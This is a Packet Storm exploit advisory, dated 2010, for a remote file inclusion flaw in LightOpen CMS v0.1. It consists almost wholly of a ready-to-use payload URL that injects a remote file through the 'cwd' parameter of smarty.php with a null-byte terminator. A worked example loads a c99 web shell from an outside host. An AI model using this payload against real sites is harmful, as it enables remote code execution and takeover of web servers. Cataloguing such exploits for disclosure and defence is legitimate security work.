LightOpen CMS Remote File Inclusion

2010-01-04T00:00:00
ID PACKETSTORM:84751
Type packetstorm
Reporter Zer0 Thunder
Modified 2010-01-04T00:00:00

Description

                                        
                                            `# Exploit Title: LightOpen CMS Remote File Inclusion (smarty.php)  
# Date: 2010-01-05  
# Author: Zer0 Thunder  
# Software Link: http://sourceforge.net/projects/lightopencms/  
# Version: v0.1  
# Tested on: Windows XP sp2 [Wamp]  
# CVE :  
# Code :  
  
Exploit :  
http://site.com/path/smarty.php?cwd=[shell.txt]?%00  
  
  
Example :  
http://localhost/locms/smarty.php?cwd=http://www.cfsm.cn/c99.txt?%00  
  
########################################  
# MSN : zer0_thunder@colombohackers.com  
# Email : neonwarlock@live.com  
# Site : LKHackers.com  
# Greetz : To all my friends  
# Note : Proud to be a Sri Lankan  
########################################  
  
`